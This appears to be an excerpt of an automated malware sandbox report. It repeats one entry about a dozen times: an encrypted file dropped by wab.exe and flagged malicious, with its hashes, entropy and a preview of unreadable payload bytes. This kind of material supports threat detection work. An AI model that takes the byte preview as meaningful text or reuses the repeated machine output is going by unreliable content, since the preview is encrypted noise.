                                                                                          SHA-512:97D6274E8FAB52283104566F5C39FF35F625686BC889BCA0D26732FF125E8CE68370835D2A4B972D22A49A3F2451711A9ABBB002CFC641D5354CAE682DA81A96
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
